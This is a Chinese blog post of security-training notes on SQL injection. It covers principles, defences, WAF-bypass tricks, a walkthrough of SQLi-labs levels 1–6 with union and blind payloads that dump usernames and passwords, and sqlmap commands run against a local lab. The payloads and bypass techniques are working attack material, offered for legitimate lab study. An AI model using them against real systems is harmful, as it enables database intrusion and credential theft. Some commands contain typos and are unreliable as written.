网安实训Day5

已于 2024-09-03 10:32:07 修改
阅读量1k 收藏 21
点赞数 23
文章标签: 数据库 sql
于 2024-08-31 17:56:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63437897/article/details/141750134
版权

网安实训Day5

1. SQL注入总结

SQL注入原理

SQL注入(SQL Injection)是一种攻击方式,攻击者通过向应用程序提交恶意构造的SQL语句,从而影响数据库的执行结果。SQL注入通常发生在应用程序未对用户输入进行充分验证或转义时,直接将用户输入嵌入到SQL查询中。

攻击目标:

  • 读取敏感数据
  • 修改数据库数据
  • 执行数据库命令
  • 规避身份认证
  • 破坏数据完整性
SQL注入常用函数及含义
  • UNION:将多个SELECT语句的结果合并为一个结果集。
  • SELECT:从数据库中检索数据。
  • AND/OR:构造条件判断,常用于布尔型注入。
  • CONCAT():将多个字符串连接在一起。
  • IF():条件判断函数,根据条件返回不同的值。
  • SLEEP():用于时间盲注,延迟操作以判断条件真假。
  • --:SQL注释符,用于注释掉SQL语句中多余的部分。
  • INFORMATION_SCHEMA:系统数据库,用于枚举数据库、表和列信息。
SQL注入防御手段
  • 使用预编译语句(Prepared Statements):避免将用户输入直接嵌入SQL查询。
  • 输入验证:严格验证用户输入,限制输入的字符类型和长度。
  • 输出转义:对数据进行转义,避免直接嵌入HTML中。
  • 最小化数据库权限:限制应用程序的数据库权限。
  • 使用WAF(Web Application Firewall):检测和拦截SQL注入攻击。
  • 安全编码规范:遵循安全编码实践,定期审计和测试代码。
SQL注入常用绕过WAF的方法
  • 注释符混淆:使用不同的注释符如/**/%23
  • 大小写混淆:混合使用大小写来绕过规则匹配。
  • 字符编码:使用URL编码、Unicode编码等方式混淆SQL语句。
  • 逻辑运算符替换:使用不同的逻辑运算符替换,如&&代替AND
  • 子查询嵌套:将SQL语句嵌套在子查询中。
  • 分段攻击:将SQL语句分割成多段进行多次请求。
  • 使用时延函数:利用SLEEP()等函数进行时间盲注。

2. SQLi-labs通关前5关解题步骤

1. 关卡 1

输入1'查看回显,发现是单引号闭合
在这里插入图片描述

在后面添加--+注释掉后面的LIMIT,让语句可以正常执行
在这里插入图片描述
使用order by 语句。采用二分法确定有3列
在这里插入图片描述
在这里插入图片描述
使用联合查询 union select 并将id值改为-1,使其不影响查询结果。然后根据回显判断注入点2,3
在这里插入图片描述
使用database()函数获得当前的数据库名security
在这里插入图片描述
使用UNION SELECT 1, GROUP_CONCAT(table_name), 3 FROM information_schema.tables WHERE table_schema='security'语句获得该数据库的表名
在这里插入图片描述
根据表的名字,可以大胆猜测用户的相关信息在users表中,使用union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'语句,获取users表中的列名
在这里插入图片描述
使用union select 1,group_concat(concat_ws(':',username,password)),3 from security.users获取到用户名和密码,并用:连接起来
在这里插入图片描述

2. 关卡 2

输入1\发现是数字类型
在这里插入图片描述
使用--+注释掉LIMIT,剩下的与第一关差不多,只是要把单引号'去掉

3. 关卡 3

输入1\发现是')闭合

在这里插入图片描述
--+注释掉后面的LIMIT
在这里插入图片描述
剩下的与第一关一致,只是需要把'改为')

4. 关卡 4

老样子输入1\,根据回显判断出是")闭合
在这里插入图片描述
--+注释掉后面的内容
在这里插入图片描述
剩下的与第一关一致,只是需要把'改为")

5. 关卡 5

输入1\判断是单引号闭合
在这里插入图片描述
--+注释掉后面的内容
在这里插入图片描述
order by 语句看看有多少列
在这里插入图片描述
在这里插入图片描述
这里的回显内容可以知道sql语句执行成功,但是得不到其他的信息,尝试用and连接两个判断,来推断数据库名的长度为8
在这里插入图片描述
在这里插入图片描述
得到数据库的长度后,使用burpsuit抓包,爆破一下数据库的名字
在这里插入图片描述

发送到Inruder模块,并添加payload位置
在这里插入图片描述

添加payload集
在这里插入图片描述
在这里插入图片描述
攻击得到数据库名security
在这里插入图片描述
使用length((select group_concat(table_name) from information_schema.tables where table_schema='security'))>正整数语句来判断表的名字长度为28
在这里插入图片描述
在这里插入图片描述
使用1' and SUBSTRING((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a' --+语句,并用burpsuit抓包进行爆破,具体步骤可以参考上述爆破数据库名
在这里插入图片描述
发现表名:emailes,referes,uagents,users,猜测用户信息应该在users表中,接下来判断列名长度为20
在这里插入图片描述
在这里插入图片描述
使用and SUBSTRING((select group_concat(column_name) from information_schema.tables where table_schema='security' and table_name='uses'),1,1)='a' --+语句,并用burpsuit抓包进行爆破,具体步骤可以参考上述爆破数据库名
在这里插入图片描述
获得列名:id,username,password,获取字段长度and length((select group_concat(concat_ws(':',username,password)) from security.users))>1为188
在这里插入图片描述
在这里插入图片描述
使用1' and SUBSTRING((select group_concat(concat_ws(':',username,password)) from security.users),1,1)='D'--+与上述爆破数据库名相同的手段得到结果,下面是用python脚本实现的bp
在这里插入图片描述

3. 手工SQL注入步骤总结

1. 识别注入点
1.1 寻找输入点

首先,确定可能存在注入点的输入区域。这些输入区域通常包括:

  • URL参数
  • 表单输入字段
  • Cookie
  • HTTP头信息
1.2 尝试注入基础语句

在可疑的输入点输入以下常见的测试字符以检测SQL注入的可能性:

  • 单引号:'
  • 双引号:"
  • 括号:())
  • 逻辑操作符:AND 1=1, OR 1=1

观察返回的错误信息或响应变化,以判断是否存在注入点。

2. 确定数据库类型

通过使用特定数据库的函数或语句来推测后台数据库的类型。例如:

  • SELECT @@version; 可用于MySQL
  • SELECT version(); 可用于PostgreSQL
  • SELECT @@version; 可用于SQL Server
3. 构造基础注入
3.1 单引号闭合

使用单引号闭合原始查询:

  • 原始查询:?id=1
  • 注入查询:?id=1'
3.2 使用UNION SELECT进行数据提取

使用 UNION SELECT 联合查询来尝试从其他表中获取数据:

  • 基本语句:UNION SELECT 1,2,3--+
  • 逐步调整列数和数据类型直到查询成功
4. 确定列数

利用 ORDER BY 语句逐列增加,或使用 UNION SELECT 来确定返回的列数:

  • ORDER BY 1--
  • ORDER BY 2--
  • 继续增加,直到出错,前一个成功的数字就是列数。
5. 确定可用列

使用 UNION SELECT 来确定哪些列可以显示数据:

  • 例如:UNION SELECT 1,2,3--
  • 观察哪个位置的列显示了数据,确定可以插入有效载荷的列。
6. 获取数据库信息
6.1 获取数据库名称
  • SELECT database(); 获取当前数据库名。
6.2 获取表名
  • UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database();--
6.3 获取列名
  • UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='table_name';--
6.4 获取数据
  • 使用已知的表名和列名来获取数据:
    • UNION SELECT 1,group_concat(column1,':',column2),3 FROM table_name;--
7. 绕过防火墙和过滤机制
7.1 绕过WAF
  • 使用注释:/*comment*/
  • 字符编码:将关键字进行URL编码,如 %20 替换空格
  • 使用双写:SELECTSELECT 替代 SELECT
7.2 使用延时注入
  • 利用 SLEEP() 函数来检测盲注点:
    • MySQL:SLEEP(5)
    • SQL Server:WAITFOR DELAY '00:00:05'
8. 探索并提取敏感信息

利用SQL注入进一步探索并提取敏感信息,如用户名、密码、电子邮件等。通过手工构造查询获取这些数据。

4. 使用sqlmap通过或验证第六关

执行命令python sqlmap.py -u http://127.0.0.1:7777/Less-6/?id=1扫描一下目标网站
在这里插入图片描述
执行命令python sqlmap.py -u http://127.0.0.1:7777/Less-6/?id=1 --dbs获得数据库名

在这里插入图片描述
执行命令python sqlmap.py -u http://127.0.0.1:7777/Less-6/?id=1 -D"security" --tables获得数据库中的表名
在这里插入图片描述
执行命令python sqlmap.py -u http://127.0.0.1:7777/Less-6/?id=1 -D"security" -T"users" --columns获得数据库中的表名
在这里插入图片描述
执行命令python sqlmap.py -u http://127.0.0.1:7777/Less-6/?id=1 -D"security' -T"users" -C"username,password" --dump获得数据库中users表的内容
在这里插入图片描述

快乐虫拜丶
关注
  • 23
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安实训Day5:(
qq_64696386的博客
09-02 851
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。当应用程序使用输入内容来构造动态sql语句以访问时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入。黑客通过SQL注入攻击可以拿到网站的访问权限,之后他们就可以拿到网站数据库中所有的数据,恶意的黑客可以通过SQL注入功能篡改数据库中的数据甚至会把数据库中的数据毁坏掉。
网安实训Day4
qq_63437897的博客
08-30 888
跨站脚本(Cross-Site Scripting,XSS)是一种经常出现在 WEB 应用程序中的计算机安全漏洞,是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。
网安实训Day2
qq_64696386的博客
08-28 1154
1.当用户在浏览器中输入www.baidu.com域名访问网站时,先检查本地hosts文件是否有这个网址映射关系,如果有,就先调用这个IP地址映射,完成域名解析。2.若没有这个域名的映射,则查找本地DNS解析器缓存,是否有这个网址映射关系,如果有,直接返回,完成域名解析。3.若没有没有相应的网址映射关系,客户机发送查询请求至本地DNS服务器,如果该域名包含在服务器的本地配置区域资源中,则返回解析结果给客户机,完成域名解析。
网安实训Day1
qq_64696386的博客
08-27 313
输入错误的账号密码,但输入正确的验证码时,提示我们username or password is not exists;4.点击右上角start attack开始爆破,结果如下,根据返回数据长度来判断正确的账号密码,返回长度不同于其他数据包的,就是正确的账号密码,故admin为123456。3.进入payloads模块,根据提示在payload set1中输入关于账号的字典,在payload set2中输入关于密码的字典(一般是网上搜索字典)1.根据提示查看js代码,发现前端与验证码有关的一串代码。
网安实训Day4>_<
qq_64696386的博客
08-29 751
一、反射型、存储型、DOM型XSS特点及区别 XSS属于注入类漏洞,其本质是:在前端代码中用户可以控制内容的地方(简称可控点),拼接上一段可被浏览器执行的新语句。这里可被浏览器执行是关键,不管你正在测试的点是否有漏洞,首先拼接上去的脚本同上下文看来,需要一定程度的符合前端代码的语法结构。 (一)反射型XSS 1.反射型跨站脚本也称作非持久型、参数型跨站脚本、这类型的脚本是最常见的 ,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。 如:http://www.test.com/s
网安实训Day6*_*
qq_64696386的博客
09-02 925
攻击者会诱导用户访问一个恶意网站或点击恶意链接,该网站或链接会携带伪造的请求,这些请求看起来像是来自用户自己的合法请求,从而绕过网站的安全措施。当服务端使用curl函数来处理用户提交的URL时,如果不对URL进行严格的过滤和验证,或者在使用curl时没有设置合适的选项来限制请求的行为(如设置超时时间、限制请求的大小等),就可能被攻击者利用来发起SSRF攻击。这种方法的核心在于,每个用户的每个请求都会附带一个唯一的Token,服务器在接收到请求时会验证这个Token的有效性,从而确保请求是由合法用户发出的。
网安实训Day3~_~
qq_64696386的博客
08-29 575
xray对pikachu的主动/被动扫描以及与bp联合扫描、goby扫描pikachu
网安实训Day7—_—
最新发布
qq_64696386的博客
09-04 605
蚁剑抓包流量分析、冰蝎抓包流量分析、哥斯拉抓包流量分析
网络安全实训Day1
Yisitelz的博客
03-11 988
网络安全实训笔记,day1
苏嵌物联网嵌入式开发实训Day0--Kali Linux 虚拟机的安装
sinat_30609573的博客
07-11 1001
kali2020版本虚拟机的安装最详细教程,没有之一
2019年度优秀安全内容合集
热门推荐
anquanzushiye的博客
01-06 3万+
2019信息源与信息类型占比微信公众号推荐昵称_英语weixin_no标题网址安全祖师爷PowerShell渗透–帝国https://mp.weixin.qq.com/s/giBR-rn...
【Network Security!】Web安全学习及异或解密示例
李响
02-22 1010
文章目录一.工具&术语1.网安术语2.常用工具3.推荐文章二.常见攻击1.SQL注入2.XSS跨站3.越权漏洞三.音乐异或解密示例 一.工具&术语 1.网安术语 常见安全网站及论坛: 看雪(https://bbs.pediy.com/) 安全客(https://www.anquanke.com) freebuf(https://www.freebuf.com/) 安全牛(http...
mysql-day02
m0_64370841的博客
08-29 2254
【代码】mysql-day02。
Redis基础命令和事务,redis持久化和主从复制
baomingshu的博客
08-31 1761
nosql数据库介绍:解释为 non-relational(非关系型数据库)。在NoSQL 数据库中数据之间是无联系的数据的结构是松散的,可变的。优势:大数据量,高性能,灵活的数据模型,高可用,低成本劣势:(1)无关系,数据之间是无联系的。
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1795
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
编译原理简介
m0_52796585的博客
09-01 990
编译原理是计算机科学中的一个核心领域,它涉及到将高级编程语言编写的源代码转换成机器语言的过程。这个过程对于计算机程序的运行至关重要,因为计算机硬件只能理解机器语言指令。编译原理不仅关注编译器的设计和实现,还涉及语言的语义、语法分析、代码优化等多个方面。
您应该使用哪个矢量数据库? 选择最适合您需求的数据库
weixin_41446370的博客
09-01 1328
在现实世界中,并非所有数据都能整齐地排列成行和列。在处理复杂的非结构化数据(如图像、视频和自然语言)时尤其如此。矢量数据库是一种以高维矢量形式存储数据的数据库,本质上是代表对象特征或特性的数字列表。每个矢量对应一个独特的实体,如一段文本、图像或视频。但为什么要使用矢量呢?奥妙就在于它能够捕捉语义和相似性。通过将数据表示为向量,我们可以对它们进行数学比较,并确定它们的相似或不相似程度。这使我们能够执行复杂的查询,如 "为我查找与此相似的图片 "或 “检索与此文本语义相关的文档”。
mongodb在Java中条件分组聚合查询并且分页(时间戳,按日期分组,年月日...)
简单发点工作中用到的,或者记录下小知识点
09-03 1208
按时间 年月日条件分组,筛选数据,统计数据,聚合查询 打印出mongo的SQL语句
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。 2. 使用自定义的主题,可以在样式表中添加以下代码: <style name="AppTheme" parent="Theme.AppCompat.NoActionBar"> <!-- ...其他样式... --> </style> 这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。 3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。 以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值